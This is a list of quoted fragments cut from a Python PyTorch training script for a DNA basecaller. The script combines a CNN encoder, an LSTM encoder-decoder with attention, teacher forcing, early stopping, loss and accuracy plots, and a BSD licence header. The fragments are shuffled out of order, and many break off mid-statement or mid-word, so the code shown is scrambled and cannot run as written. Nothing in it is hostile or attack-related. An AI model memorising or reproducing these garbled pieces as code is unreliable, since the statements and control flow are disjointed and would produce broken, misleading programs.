"F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1) # encoder batch first: b,len,hidden, hidden:",
"batch_size, hidden_dim). # Sort instances by sequence length in descending order #print(\"in length\",",
"help=\"Teacher forcing ratio. Default=1, TF on\") parser.add_argument('--weight_decay', type=float, default=0, help=\"Weight decay\") parser.add_argument('--learning_rate', type=float,",
"input #if not, use predicted token onehot = torch.zeros(len(top1), self.output_dim).cuda(self.port) onehot[:, top1] =",
"= sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of not padded elements",
"Calculate cross entropy loss # output = (seq*batch, out dim), target = (seq*batch)",
"from trainings set\") if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_error_accuarcy_iterations_val(input,",
"encoder_outputs = encoder_outputs[not_padded_batches, :, :] else: label = y[:, :, i] # batch,",
"= args.lstm_layers bidir = args.bi_lstm attention = args.attention dropout = args.dropout # CNN",
"print(\"train: \", train_set[0].size(), train_set[1].size(), train_set[2].size(), train_set[3].size(), train_set[4].size(), train_set[5].size()) print(\"validation: \", val_set[0].size(), val_set[1].size(), val_set[2].size(),",
"batch_size=batch, n_epochs=epochs, teacher_forcing_ratio=teacher, make_validation=make_validation, file_name=save_files_path + \"{}_checkpoint.pt\".format(fname), earlyStopping=earlyStopping, patience=patience_earlyStop, writer=writer, editD=editD) end =",
"input_biases[idx_b+3, idx] = np.linalg.norm(m[start: end], ord=2) idx_b += 4 y_len = [\"\\n\".join([\".\".join([x.split(\".\")[0], x.split(\".\")[1]]),",
"parameters') f = open(save_files_path + \"{}_sig_length.txt\".format(fname), \"w\") f.write(infile + \" \\n\") f.write(\"Training: \\nSignal:\\n\")",
"= hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h",
"2, 1) #self.attn = nn.Linear(self.hidden_dim * 2, self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def",
"= args.strides kernel = args.kernel cnn_out = args.channel_number #256 pooling_type = args.pooling_type #\"average\"",
"= args.pooling_type #\"average\" n_layers_cnn = args.cnn_layers batch_normalization = args.batch_norm dropout_on = args.dropout_cnn dropout_input",
"intervals if epoch == 0: ax.plot(np.arange(0, len(p[epoch].detach().numpy())), p[epoch].detach().numpy(), label=\"update {}\".format(epoch), color=\"#000000\", alpha=0.8) else:",
"= data_val[0] batch_y_val = data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val =",
"len(x_len))) if split_LSTMbiases: y_len_biases = [] for name in y_len: if \"bias\" in",
"lr=lr, momentum=0) else: optimizer = optim.Adam(model12.parameters(), lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The",
"val_set[3])) f.write(\"\\nTarget:\\n\") f.write(\"{}\\ttrue target length: {}\\n\".format(val_set[1].size(), val_set[4])) f.write(\"\\nRead idx:\\n\") f.write(\"{}\\n\\n\".format(val_set[5])) f.write(\"Model:\\n\") f.write(str(model12)) f.write(\"\\nThe",
"= {} dict_activations_cell = {} dict_activations_out = {} dict_activations_in_decoder = {} dict_activations_forget_decoder =",
"heatmap_g = None heatmap_w = None heatmap_g_b = None heatmap_w_b = None counter_updates_teacherForcing",
"f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder)) f.close() # with",
"LSTM random_value = random.random() out_decoder, decoder_hidden = self.lstm_decoder( sorted_encoder_output, seq_len_cnn, max_label_len, labels10_sorted, teacher_forcing_ratio,",
"ax = fig.add_subplot(1, 3, 1) ax.plot(list(loss_train.keys()), list(loss_train.values()), label=\"training error\") if validation: ax.plot(list(loss_val.keys()), list(loss_val.values()),",
"create your dataloader return(train_loader) def convert_to_string(pred, target, target_lengths): import editdistance vocab = {0:",
"true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i < true_y_len # get indices",
"self.hidden_dim) self.linear = nn.Linear(self.hidden_dim, self.output_dim) def forward(self, encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden,",
"CNN #Forward pass, backward pass, optimize in_lstm, seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm =",
"= args.dropout_input dropout_probability = args.drop_prob call = args.call lr = args.learning_rate editD =",
"= editdistance.eval(encoded_pred, encoded_target) editd += result num_chars += len(encoded_target) return editd, num_chars def",
"script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out = script_dir + \"/\" + infile",
"5 # indices of not padded elements loss = criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss",
"len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]),",
"unsorted_hiddens2 = hidden[1][:, original_idx, :]#.gather(0, unsorted_idx_hiddens.long()) hidden_original = (unsorted_hiddens1, unsorted_hiddens2)#.cpu() unpacked_original = unpacked[original_idx,",
"CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY",
":] else: label = y[:, :, i] # batch, features, seq len if",
"ax = fig.add_subplot(2, 2, i) for epoch in p.keys(): if epoch % print_epoch",
"%\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if editD: ax = fig.add_subplot(1,",
"get_train_loader_trainVal(input_x, signal_len, input_y, label_len, input_y10, batch_size=batch_size, shuffle=True) if val_ds != None: val_loader =",
"print(\"gradient clipping=\", clipping_value) print(\"teacher forcing ratio=\", teacher_forcing_ratio) print(\"shuffle=\", shuffle) if val_ds is not",
"if val_ds is not None: input_x_val = val_ds[0] input_y_val = val_ds[1] input_y10_val =",
"in enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x = data[0]",
"in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\",",
"(batch_size*seq, out_dim) --> (batch_size, out_dim) #decide if we are going to use teacher",
"current model if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break",
"script_dir + '/training_result_{}/'.format(fname) writer = SummaryWriter(script_dir + '/training_result_{}'.format(fname)) train_set = read_data[0] val_set =",
"LSTM layer lstm_out, hidden = self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the",
"f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on",
"{0: \"A\", 1: \"C\", 2: \"G\", 3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd",
"plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1, 3,",
"super(LSTMCellEncoder, self).__init__() self.input_size = input_size self.hidden_size = hidden_size self.bias = bias self.i2h =",
"4 * hidden_size, bias=bias) self.h2h = nn.Linear(hidden_size, 4 * hidden_size, bias=bias) # self.reset_parameters()",
"= False): x_len = list(dict_weights.keys()) y_len = list(dict_weights[x_len[0]].keys()) input = np.zeros((len(y_len), len(x_len))) input_grad",
"acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], editd_train[max_idx_train],",
"plt.ylabel(\"Activation\") if i == 1: plt.legend(bbox_to_anchor=(1.05, 1.05)) plt.title(\"{} {}\".format(label, title)) if pdf is",
"is [batch, seq_len, input_dim] def __init__(self, input_dim, hidden_dim, batch_size, output_dim=5, num_layers=2, own_cell_encoder =",
"import time import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import",
"provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND",
"output.view(-1, output.size(2)) reshaped_sorted_labels = sorted_labels.view(-1) notpadded_index = reshaped_sorted_labels != 5 # indices of",
"= criterion(reshaped_output, reshaped_sorted_labels.long()) loss_iteration.append(loss.item()) epoch_loss += loss.item() running_loss_train += loss.item() acc = (reshaped_output[notpadded_index,",
"set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings loss\\tvalidation loss\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], max_idx_val)) f.close() def",
"type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers', type=int, default=1, help=\"Number of",
"-1) c = c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates",
"dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration) dict_validation_acc2[updates] = np.mean(val_acc) else:",
"np.mean(val_acc) valid_loss = running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val =",
"above copyright notice, this list of conditions and the following disclaimer in the",
"dim] top1 = input_decoder.argmax(1) # get argmax of prediction #if teacher forcing, use",
"super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers =",
"# and matrix_param[p].shape[1] == 1: # (256, 1, 11) m = matrix_param[p].reshape((matrix_param[p].shape[0], -1))",
", :] # [batch, seq_len, input_dim] lab_len = lab_len[negative_idx] labels = labels[negative_idx, :]",
"> int((len(train_loader) * n_epochs)*0.5) and teacher_forcing_ratio >= 0.5: if (running_acc_train / float(make_validation)) >",
"use in source and binary forms, with or without modification, are permitted provided",
"output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of",
"and \"lstm\" in p and \"linear\" not in p: n = matrix_param[p].shape[0] #",
"= args.hidden_units #256 forget_bias = args.forget_bias_encoder forget_bias_decoder = args.forget_bias_decoder num_layers = args.lstm_layers bidir",
"typically chosen between 1 and a few hundreds, e.g. [batch size] = 32",
"input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val = max(acc_val, key=lambda k: acc_val[k])",
"layers=n_layers_cnn, batch_norm=batch_normalization, dropout = dropout_on, dropout_p = dropout_probability, dropout_input = dropout_input, input_bias_cnn=input_bias_cnn) out_channels",
"labels_sorted = labels[sorted_idx_target, :]#.gather(0, sorted_idx_lab.long()) labels10_sorted = labels10[sorted_idx_target, :, :] # batch, out_size,",
"Range(object): def __init__(self, start, end): self.start = start self.end = end def __eq__(self,",
"IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. \"\"\" import h5py import numpy",
"outgate param.data[start:end].fill_(0.) print(start, end) model12 = model12.cuda(port) print(model12, next(model12.parameters()).is_cuda) if sgd: optimizer =",
"cnn import outputLen_Conv, outputLen_AvgPool, outputLen_MaxPool plt.switch_backend('agg') class Range(object): def __init__(self, start, end): self.start",
"= outgate * F.tanh(cy) return hy, (hy, cy), (torch.mean(ingate).cpu(),torch.mean(forgetgate).cpu(), torch.mean(cellgate).cpu(), torch.mean(outgate).cpu()) class LSTMencoder(nn.Module):",
"# A=0, C=1, G=2, T=3, EOF=4 script_dir = os.path.dirname(os.path.realpath('__file__')) # script directory file_out",
"x.split(\".\")[1]]), x.split(\".\")[2]]) for x in y_len] df = pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4)",
"parameters\\n\".format(count_parameters(model12))) f.write(\"hyperparameters:\\n\") f.write(\"epochs={}, batch size={}, earlyStopping={}, patience={}, weight decay={}, clipping value={}, lr={}\\n\" .format(epochs,",
"self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :], hidden[0][0]), dim=1)), dim=1)",
"class LSTMCellDecoder(nn.Module): def __init__(self, input_size, hidden_size, bias=True, port=1): super(LSTMCellDecoder, self).__init__() self.input_size = input_size",
"/ float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train = 0.0",
"cellgate, outgate param.data[start:end].fill_(float(int(forget_bias))) print(start, end) # ingate start, end = 0, n//4 #",
"end = n//4, n//2 # ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end)",
"in early stopping\") parser.add_argument(\"--call\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?',",
"lr=lr, weight_decay=weight_decay, betas=(0.9,0.999)) criterion = torch.nn.NLLLoss(ignore_index=5)#.cuda(port) print(f'The model has {count_parameters(model12):,} trainable parameters') f",
"IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND ANY EXPRESS",
"output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens",
"hyperparameters of the training iteration: print(\"===== HYPERPARAMETERS =====\") print(\"batch_size=\", batch_size) print(\"epochs=\", n_epochs) print(\"gradient",
"seq length if i >= true_y_len[-1].item() and len(true_y_len) > 1: not_padded_batches = i",
"THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR",
"torch.zeros(max_label_len, batch_size, self.output_dim).cuda(self.port) # [max. target length, batch size, hidden dim] max_in_batch =",
"val_ds[4] read_val = val_ds[5] input_x = train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2]",
"data_val[1] seq_len_val = data_val[2] lab_len_val = data_val[3] batch_y10_val = data_val[4] inputs_val, labels_val, labels10_val",
"ax.plot(list(editd_val.keys()), list(editd_val.values()), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit Distance\") plt.legend() plt.title(\"Edit Distance vs.",
"= unpacked[original_idx, :, :] return hidden_original, unpacked_original # The Decoder # ----------- class",
"matrix_param[p].shape[0] # input gate start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start:",
"type=str, default=\"0\", help=\"Set forget gate bias in Encoder-LSTM\") parser.add_argument('--forget_bias_decoder', type=str, default=\"0\", help=\"Set forget",
"n//2 + n//4 input_biases[idx_b+2, idx] = np.linalg.norm(m[start: end], ord=2) # output gate start,",
"max_idx_val = max(acc_val, key=lambda k: acc_val[k]) f = open(fname, \"w\") if editD: f.write(\"best",
"the sequence won't be shown to the LSTM packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True)",
"sns.heatmap(df_b, linewidths=0.0, edgecolor=\"none\") figure2 = svm.get_figure() figure2.savefig(save_files_path + \"/heatmap_{}_biases.pdf\".format(filename)) plt.clf() def bestPerformance2File(input, fname,",
"outgate = F.sigmoid(outgate) cy = (forgetgate * c) + (ingate * cellgate) hy",
"encoder_hidden[1][:, sorted_idx_target, :] sorted_hiddens = (sorted_hiddens1, sorted_hiddens2) sorted_encoder_output = ecoder_output[sorted_idx_target, :, :] #",
"tensor_y, sig_len, label_len, label10) # create your datset train_loader = torch.utils.data.DataLoader(my_dataset, batch_size=batch_size, num_workers=0,",
"float(make_validation) dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration) dict_training_acc2[updates] = np.mean(val_losses) dict_validation_loss2[updates] = np.mean(acc_iteration)",
"x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0,",
"fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_train.values()))))),",
"const=True, default=False) parser.add_argument(\"--dropout_input\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument('--drop_prob', type=float, default=Range(0.0, 1.0), help=\"Dropout",
"DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS",
"= fig.add_subplot(1, 3, 3) ax.plot(np.arange(0, len(np.concatenate(np.array(list(editd_val.values()))))), np.concatenate(np.array(list(editd_val.values()))), label=\"validation edit distance\") plt.xlabel(\"Updates\") plt.ylabel(\"Normalized Edit",
"is typically chosen between 1 and a few hundreds, e.g. [batch size] =",
"error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs. updates\") ax = fig.add_subplot(1, 3, 2) ax.plot(list(acc_train.keys()),",
"title)) if pdf is not None: pdf.savefig(fig, bbox_inches=\"tight\") plt.close(\"all\") def plot_heatmap(dict_weights,save_files_path, filename, split_LSTMbiases",
"self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port = port self.dropout=dropout # Define the",
"# ed2 = old_ed # # old_ed = ed2 # epoch_editd += ed",
"v in np.concatenate(np.array(list(acc_val.values())))], label=\"validation accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates",
"other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT",
"EarlyStopping(patience=patience, verbose=True, delta=0.01, name=file_name, relative=True, decrease_lr_scheduler=reduce_lr) dict_activations_in = {} dict_activations_forget = {} dict_activations_cell",
"criterion(reshaped_output_val, reshaped_sorted_labels_val.long()) val_losses.append(loss_val.item()) epoch_loss_val += loss_val.item() running_loss_val += loss_val.item() acc_val = (reshaped_output_val[notpadded_index_val, :].argmax(1)",
"choosing if clipping_value != \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step()",
"editD: #writer.add_scalar('Edit Distance/train', running_editd_train, updates) writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates]",
"# ordering ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(float(int(forget_bias_decoder))) print(start, end) # ingate start, end",
"last element in the batch if i == max_in_batch: break # when seq",
"y_len_biases = [] for name in y_len: if \"bias\" in name and \"lstm\"",
"train_ds[0] input_y = train_ds[1] input_y10 = train_ds[2] signal_len = train_ds[3] label_len = train_ds[4]",
"TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate bias decoder={}\" .format(forget_bias, forget_bias_decoder))",
"if it has decresed, # and if it has, it will make a",
"are met: 1. Redistributions of source code must retain the above copyright notice,",
"WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO",
"= num_layers self.output_dim = output_dim self.own_cell_encoder = own_cell_encoder self.bidirectional = bidirectional self.port =",
"encoder_outputs, true_x_len, max_label_len, y, teacher_forcing_ratio, hidden, true_y_len, y_class, random_value, mode_type, beam_width=1): # Forward",
"size, hidden dim] max_in_batch = int(max(true_y_len.cpu())) start_seq = True input_decoder = torch.zeros(batch_size, self.input_dim).cuda(self.port)",
"seq len if self.attention: # ATTENTION MECHANISM attn_weights = F.softmax( self.attn(torch.cat((encoder_outputs[:, i, :],",
"have equal batch size!\" def forward(self, inputs, seq_len, teacher_forcing_ratio, labels=None, lab_len=None, labels10=None, max_label_len=None,",
"p in enumerate(y_len): if len(matrix_param[p].shape) > 2: # and matrix_param[p].shape[1] == 1: #",
"source and binary forms, with or without modification, are permitted provided that the",
"= running_loss_val / float(iteration_val + 1) running_loss_train = 0.0 running_loss_val = 0.0 running_acc_train",
"SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)",
"30) print(\"batch {} in epoch {}/{}\".format(iteration+1, epoch+1, n_epochs)) print(\"=\" * 30) print(\"loss= {0:.4f}\".format(epoch_loss",
"pin_memory=False, shuffle=shuffle) # create your dataloader return(train_loader) def get_train_loader(tensor_x, sig_len, tensor_y, label_len, label10,",
"data in enumerate(train_loader): model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x =",
"plt.legend() plt.title(\"Error vs. updates from trainings set\") ax = fig.add_subplot(1, 3, 2) ax.plot(np.arange(0,",
"fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation error\") plt.xlabel(\"Updates\") plt.ylabel(\"Error\") plt.legend() plt.title(\"Error vs.",
"import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import",
"clipping_value, lr)) f.write(\"TF={}, reduced TF ratio={}\\n\".format(teacher, reduced_TF)) f.write(\"forget gate bias encoder={}, forget gate",
"in [\"input\", \"forget\", \"cell\", \"output\"]: y_len_biases.append(name + \".\" + b) input_biases = np.zeros((len(y_len_biases),",
"writer.add_scalar('Edit Distance/validation', cer, updates) #dict_training_editd2[updates] = running_editd_train dict_validation_editd2[updates] = cer dict_training_loss2[updates] = np.mean(loss_iteration)",
"# [seq_len, batch, input_dim] # undo the packing operation unpacked, unpacked_len = nn.utils.rnn.pad_packed_sequence(lstm_out,",
"patience=patience_earlyStop, writer=writer, editD=editD) end = time.time() hours, rem = divmod(end-start, 3600) minutes, seconds",
"self.attn = nn.Linear(self.hidden_dim * 4, 1) #self.attn = nn.Linear(self.hidden_dim * 4, self.hidden_dim *",
"print(start, end) # cellgate, outgate start, end = n//2, n # ordering ingate,",
"random import time import matplotlib.pyplot as plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf",
"_, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu() unsorted_idx_hiddens =",
"lstm_dec)#.cuda(port) model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in name: if forget_bias",
"plt import matplotlib.ticker as ticker from matplotlib.backends.backend_pdf import PdfPages import math import torch.optim",
"target = (seq*batch) # Target nicht one-hot encoden reshaped_output = output.view(-1, output.size(2)) reshaped_sorted_labels",
":, :] encoder_hidden, ecoder_output = self.lstm_encoder(in_lstm, seq_len_cnn) ########################################### ##### Sorting ############################# ########################################### ####",
"reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5 # indices of not padded",
"bottom=0, top=2, hspace=0.2, wspace=0.2) ax = fig.add_subplot(1, 3, 1) ax.plot(np.arange(0, len(np.concatenate(np.array(list(loss_val.values()))))), np.concatenate(np.array(list(loss_val.values()))), label=\"validation",
"distutils.util import strtobool from polyleven import levenshtein sys.path.insert(0, '/basecaller-modules') from early_stopping import EarlyStopping",
"model.train() #Set the parameter gradients to zero optimizer.zero_grad() batch_x = data[0] batch_y =",
"input[1], input[2], input[3], input[4], input[5] fig = plt.figure(figsize=(18,2)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2,",
"# old_ed = ed2 # epoch_editd += ed # running_editd_train += ed #",
"dict_activations_forget, dict_activations_cell, dict_activations_out], [dict_activations_in_decoder, dict_activations_forget_decoder, dict_activations_cell_decoder, dict_activations_out_decoder], [dict_weights, dict_gradients]]) def count_parameters(model): return sum(p.numel()",
"probability Encoder-LSTM\") parser.add_argument('-u', '--hidden_units', type=int, default=256, help=\"Number of hidden units in Encoder-Decoder-LSTM\") parser.add_argument('--lstm_layers',",
"python \"\"\" BSD 2-Clause License Copyright (c) 2021 (<EMAIL>) All rights reserved. Redistribution",
"dropout=0): super(LSTMdecoder, self).__init__() self.input_dim = input_dim self.hidden_dim = hidden_dim self.batch_size = batch_size self.num_layers",
"p and \"linear\" not in p: n = matrix_param[p].shape[0] # input gate start,",
"input[1], input[2], input[3], input[4], input[5] max_idx_train = max(acc_train, key=lambda k: acc_train[k]) max_idx_val =",
"encoden reshaped_output_val = output_val.view(-1, output_val.size(2)) reshaped_sorted_labels_val = sorted_labels_val.view(-1) notpadded_index_val = reshaped_sorted_labels_val != 5",
"if earlyStopping: early_stopping(np.mean(val_losses), model, optimizer, updates) if early_stopping.early_stop: print(\"Early stopping\") break if reduce_lr:",
"True, help=\"File path to the pickle input file.\") parser.add_argument('-o', '--output', required = True,",
"sorted_inputs = x.gather(0, index_sorted_idx.long()) # [batch, seq_len, input_dim] # pack_padded_sequence so that padded",
"f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_train], acc_val[max_idx_train], loss_train[max_idx_train], loss_val[max_idx_train], max_idx_train)) f.write(\"\\nbest performances on validation set\\n\") f.write(\"trainings acc\\tvalidation acc\\ttrainings",
"torch import torch.nn as nn from torch.autograd import Variable import torch.nn.functional as F",
"= self.lstm(packed_seq) # [seq_len, batch, input_dim] # undo the packing operation unpacked, unpacked_len",
"# LSTM arguments parser.add_argument(\"--attention\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=True) parser.add_argument('--dropout', type=float, default=Range(0.0, 1.0),",
"3: \"T\", 4: \"<EOS>\", 5: \"<PAD>\"} editd = 0 num_chars = 0 for",
"(val_ds != None) and (updates % make_validation == 0): # or (updates ==",
"start, end = 0, n//4 input_biases[idx_b, idx] = np.linalg.norm(m[start: end], ord=2) # forget",
":, :] # batch-i, features, seq len encoder_outputs = encoder_outputs[not_padded_batches, :, :] else:",
"use teacher forcing or not teacher_force = random.random() < teacher_forcing_ratio # put on",
"assert lstm_encoder.num_layers == lstm_decoder.num_layers, \"Encoder and decoder must have equal number of layers!\"",
"ed2 = old_ed # # old_ed = ed2 # epoch_editd += ed #",
"if we are going to use teacher forcing or not teacher_force = random.random()",
"= pd.DataFrame(input, index=y_len, columns=x_len) print(df.head()) sns.set(font_scale=0.4) svm = sns.heatmap(df, linewidths=0.0, edgecolor=\"none\") figure =",
"seq_len_cnn = self.cnn_encoder(inputs, seq_len) in_lstm = torch.transpose(in_lstm, 1, 2) # input for LSTM",
"type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) parser.add_argument(\"--editD\", type=lambda x:bool(strtobool(x)), nargs='?', const=True, default=False) return parser",
"!= \"None\": nn.utils.clip_grad_norm_(model.parameters(), int(clipping_value)) # Update encoder and decoder optimizer.step() if (val_ds !=",
"1 [batch size, SOS token] for i in max_for: # Stop looping if",
"input_y10_val, batch_size=batch_size, shuffle=True) if earlyStopping: # initialize the early_stopping object early_stopping = EarlyStopping(patience=patience,",
"+ 1)) * 100)) print(\"=\" * 100) dict_validation_loss[epoch] = val_losses dict_validation_acc[epoch] = val_acc",
"##### Sorting ############################# ########################################### #### sort by decreasing target length sorted_len_target, sorted_idx_target =",
"c.view(c.size(0), -1) x = x.view(x.size(0), -1) # Linear mappings gates = self.i2h(x) +",
"print(\"teacher forcing ratio= {}\".format(teacher_forcing_ratio), \", update= \", updates, \", half of updates= \",",
"pickle.dump(out12, open(save_files_path + \"{}.p\".format(fname), \"wb\" )) with PdfPages(save_files_path + \"{}.pdf\".format(fname)) as pdf: plot_error_accuarcy(out12[1],",
"Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in Encoder-CNN\") parser.add_argument(\"--dropout_cnn\", type=lambda",
"hidden_size self.bias = bias self.i2h = nn.Linear(input_size, 4 * hidden_size, bias=bias) self.h2h =",
"size, SOS token] for i in max_for: # Stop looping if we got",
"1], help=\"Strides in Encoder-CNN\") parser.add_argument('--kernel', nargs='+', type=int, default=[11, 11, 11], help=\"Kernel sizes in",
"= plt.figure(figsize=(13,4)) fig.subplots_adjust(left=0, right=1, bottom=0, top=2, hspace=0.2, wspace=0.5) i = 0 for p,",
"accuracy\") plt.xlabel(\"Updates\") plt.ylabel(\"Accuracy in %\") plt.legend() plt.title(\"Accuracy vs. updates from validation set\") if",
"model12.apply(init_weights_orthogonal_lstm) for name, param in model12.named_parameters(): if \"bias\" in name: if forget_bias !=",
"ingate, forgetgate, cellgate, outgate param.data[start:end].fill_(0.) print(start, end) if forget_bias_decoder != \"None\" and \"lstm_decoder\"",
"the output _, original_idx = sorted_idx.sort(0, descending=False) # unsort hiddens original_idx = original_idx.cpu()",
"packed_seq = nn.utils.rnn.pack_padded_sequence(sorted_inputs, sorted_len.cpu().numpy(), batch_first=True) # Define the LSTM layer lstm_out, hidden =",
"acc\\ttrainings loss\\tvalidation loss\\ttrainings edit distance\\tvalidation edit distance\\tupdate\\n\") f.write(\"{}\\t{}\\t{}\\t{}\\t{}\\t{}\\t{}\\n\".format(acc_train[max_idx_val], acc_val[max_idx_val], loss_train[max_idx_val], loss_val[max_idx_val], editd_train[max_idx_val], editd_val[max_idx_val],",
"teacher_forcing_ratio=0.5, reduced_TF=True, make_validation=1000, mode=\"train\", shuffle=True, patience = 25, file_name=\"model\", earlyStopping=False, writer=\"\", editD=True, reduce_lr=False):",
"break if reduce_lr: scheduler.step(loss_val) updates +=1 dict_training_loss[epoch] = loss_iteration dict_training_acc[epoch] = acc_iteration if",
"parser.add_argument('-s', '--set_seed', type=int, default=1234, help=\"Set seed\") parser.add_argument('-b', '--batch_size', type=int, default=256, help=\"Batch size\") parser.add_argument('-e',",
"help=\"Output folder name\") parser.add_argument('-g', '--gpu_port', type=int, default=1, help=\"Port on GPU mode\") parser.add_argument('-s', '--set_seed',",
